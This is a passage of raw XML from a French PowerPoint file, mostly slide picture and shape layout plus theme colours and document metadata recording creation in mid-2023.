            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Image 1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0A78F5EE-3C66-0D0E-8DEA-17439E95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72" y="5139809"/>
            <a:ext cx="1841519" cy="1036336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Image 17" descr="Une image contenant Police, Graphique, graphisme, logo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E769E94-1747-892E-BF8C-C7F91514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69" y="795406"/>
            <a:ext cx="4076351" cy="740537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Graphique 19" descr="Bloc-notes avec crayon et papier graphique">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7BA7F1-5A49-EE2D-F5CB-49447360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3919" y="696206"/>
            <a:ext cx="2794756" cy="2794756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Image 21" descr="Une image contenant croquis, Graphique, clipart, Pochoir&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{744D4072-5996-DE3B-B1E5-E40196FC6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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="5034153"/>
            <a:ext cx="1327005" cy="130012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D71569-8C8D-8177-6A9E-1A06C6DF3C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5741472" y="-141569"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="3895664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ED144A4-CC9C-037D-AF7E-E6A1230CA025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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4657E09-A143-4397-1619-02DE37B4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893" y="2474588"/>
              <a:ext cx="4268278" cy="315253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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effec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FD5A266-D9E2-3A4D-6FD1-509F51EF16CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6084744" y="-5668479"/>
            <a:ext cx="6729115" cy="4994996"/>
            <a:chOff x="5291526" y="456122"/>
            <a:chExt cx="6729115" cy="4994996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07F1F35B-0D57-B859-804E-C2AA1DA99E4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5291526" y="456122"/>
              <a:ext cx="6729115" cy="4994996"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2D2B2B"/>
                </a:gs>
                <a:gs pos="62000">
                  <a:srgbClr val="353333"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="3533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0CDBB9C-D7E4-E9DA-7DE5-5E23444D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97903" y="826834"/>
              <a:ext cx="6116359" cy="4158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42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282C34"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="D8DEE9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1682</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>572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Montserrat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YukihiraTV Soma</dc:creator>
  <cp:lastModifiedBy>YukihiraTV Soma</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-27T12:58:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-03T22:00:28Z</dcterms:modified>
</cp:coreProperties>
</file>